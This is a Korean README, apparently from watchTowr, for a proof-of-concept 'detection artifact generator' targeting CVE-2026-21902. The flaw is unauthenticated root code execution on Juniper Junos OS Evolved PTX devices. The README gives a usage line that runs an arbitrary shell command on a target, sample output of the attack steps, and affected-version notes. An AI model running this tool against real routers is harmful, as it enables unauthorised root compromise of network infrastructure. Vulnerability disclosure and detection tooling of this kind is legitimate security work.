
CVE-2026-21902에 대한 탐지 아티팩트를 생성하여 Juniper Junos Evolved에서 명령 및 DAG 생성을 통한 인증되지 않은 원격 코드 실행 확인을 가능하게 합니다.
Juniper Junos Evolved CVE-2026-21902 탐지 아티팩트 생성기.
https://github.com/user-attachments/assets/a7d667e1-7636-4097-ab3f-838944cdcccc
기술적 세부 사항은 블로그 포스트를 참조하세요.
python .\watchTowr-vs-JunosEvolved-CVE-2026-21902.py 127.0.0.1 -c "id > /var/home/admin/watchTowr.txt"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-JunosEvolved-CVE-2026-21902.py
(*) Juniper JunosEvolved Unauthenticated Remote Code Execution Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-21902]
[+] COMMAND cmd1 created
[+] DAG dag1 created
[+] DAG INSTANCE instance1 created
[+] Config committed...
[#] Waiting for command execution...
[+] Command executed, check the target for results!
이 스크립트는 Junos Evolved OS 및 PTX 시리즈가 CVE-2026-21902에 취약한지 탐지하려 시도합니다.
이 문제는 PTX 시리즈의 Junos OS Evolved에 영향을 미칩니다:
이 문제는 25.4R1-EVO 이전의 Junos OS Evolved 버전에는 영향을 미치지 않습니다.
이 문제는 Junos OS에는 영향을 미치지 않습니다.
자세한 내용은 권고문 Junos OS Evolved: PTX 시리즈: 인증되지 않은 네트워크 기반 공격자가 루트 권한으로 코드를 실행할 수 있는 취약점을 참조하세요.
최신 보안 연구를 위해 watchTowr 연구소 팀을 팔로우하세요.